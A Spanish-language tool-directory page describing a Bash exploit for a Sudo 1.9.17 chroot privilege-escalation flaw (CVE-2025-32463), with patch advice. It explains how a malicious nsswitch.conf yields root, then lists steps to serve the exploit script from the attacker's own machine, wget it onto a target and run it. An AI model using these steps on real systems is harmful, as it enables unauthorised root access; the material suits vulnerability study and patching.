Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-32463 — Script de exploit en Bash para CVE-2025-32463, una vulnerabilidad de escalada local de privilegios en Sudo 1.9.17 mediante la opción chroot, que permite acceso root en sistemas afectados. | Kitploit
Herramientas/GitHubGitHub/justjoeyking/cve-2025-32463
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónAprendizaje y EducaciónRed Teaming
GitHubjustjoeyking/cve-2025-32463

CVE-2025-32463

Script de exploit en Bash para CVE-2025-32463, una vulnerabilidad de escalada local de privilegios en Sudo 1.9.17 mediante la opción chroot, que permite acceso root en sistemas afectados.

Ver Repositorio
3hace 10 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

La versión 1.9.17 de Sudo tiene una vulnerabilidad crítica (CVE-2025-32463) que permite a usuarios locales obtener acceso root explotando la opción chroot, lo que puede conllevar graves riesgos de seguridad. Se recomienda a los usuarios actualizar a la versión 1.9.17p1 o posterior para mitigar este problema.

Resumen de la vulnerabilidad de Sudo 1.9.17:-

La vulnerabilidad en la versión 1.9.17 de Sudo, identificada como CVE-2025-32463, es una falla crítica que permite a usuarios locales obtener acceso root. Este problema surge de un cambio en la forma en que Sudo maneja la opción --chroot (-R), que está diseñada para aislar procesos cambiando su directorio raíz.

Cómo funciona la vulnerabilidad:-

Problema de resolución de rutas: En las versiones 1.9.14 a 1.9.17, Sudo evalúa la opción --chroot antes de verificar los permisos del usuario. Esto permite a los atacantes controlar el entorno y cargar bibliotecas maliciosas.

Pasos de explotación:

Un atacante crea un archivo nsswitch.conf malicioso en un directorio que controla. Ejecuta Sudo con la opción -R, lo que hace que Sudo cargue la configuración y bibliotecas del atacante, otorgando acceso root.

He creado un script bash "cwoot.sh" que, tras su ejecución, elevará directamente al usuario root.

Haz lo siguiente:

Descargar el script del repositorio: git clone https://github.com/justjoeyking/CVE-2025-32463.git

En la máquina propia: python3 -m http.server 8080

En la máquina objetivo: wget http://<own_IP_address>:8080/cwoot.sh

En la máquina objetivo: chmod 755 cwoot.sh

Ejecutar script en la máquina objetivo: ./cwoot.sh

Descargar herramienta